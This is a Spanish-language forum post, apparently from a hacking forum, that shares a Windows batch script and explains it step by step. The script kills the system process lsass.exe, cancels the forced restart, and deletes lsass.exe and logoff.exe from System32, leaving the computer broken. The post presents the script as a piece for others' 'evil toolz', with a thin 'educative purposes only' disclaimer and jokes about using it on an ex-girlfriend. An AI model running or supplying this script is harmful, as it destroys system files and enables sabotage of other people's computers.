* * educative purposes only, no me responsabilizo de que te jodas el ordenador * *
@echo off
taskkill /IM lsass.exe /f
shutdown -a
del /q /f %WINDIR%\System32\lsass.exe
del /q / f %WINDIR%\System32\logoff.exe
exit
* educative purposes only, no me responsabilizo de que jodas ordenadores ajenos *
Este código hará las delicias de los que mepiecen a programar sus "evil toolz" en batch, ya que puede usarse sólo o incorporado a un código mayor.
SI VAS A HACER ALGO GORDO EN BATCH NO SEAS MALA GENTE Y MÁNDALO A VIRUSTOTAL. INFECTAR POR INFECTAR Y HAER DAÑO POR HACER DAÑO ES TERRORISMO.
|------------------>
Y ahora, una breve explicación que probablemente nadie lea
![:xD](https://foro.elhacker.net/Smileys/navidad/xd.gif)
Lo primero que hace este código es parar el proceso lsass.exe. Para ello se vale del modificador /f, que indica carácter forzado (para el que no lo sepa, el lsass.exe es un proceso de sistema
![:¬¬](https://foro.elhacker.net/Smileys/navidad/carita.gif)
Al abortar el proceso se inicia una cuenta atrás de 30 segundos para que se reinicie el ordenador. Para abortarla se utiliza el comando shutdown con el modificador -a.
¿Qué hemos conseguido con esto? Pues simple y llanamente que el ordenador no pueda apagarse si no es tirando del cable de la luz. ¿Divertido ehh?
![:xD](https://foro.elhacker.net/Smileys/navidad/xd.gif)
Entonces... ¿para qué valen los otros dos comandos? (dando por supuesto que se sabe para qué sirve el comando "exit"). Pues muy sencillo. Como además de traviesos somos malos, pero malos malos con ganas, pues no queremos que el ordenador pueda ser apagado nunca más.
Esos dos comandos hacen que el pequeño lío en el que has metido a la máquina no se solucione reiniciando. ¿Y cómo lo hace? Pues eliminando el archivo lsass.exe y el logoff.exe. Si no hay archivo, no hay proceso
![:rolleyes:](https://foro.elhacker.net/Smileys/navidad/rolleyes.gif)
![;D](https://foro.elhacker.net/Smileys/navidad/grin.gif)
Sed buenos y no se lo hagáis a vuestra exnovia
![:¬¬](https://foro.elhacker.net/Smileys/navidad/carita.gif)
Hasta otra!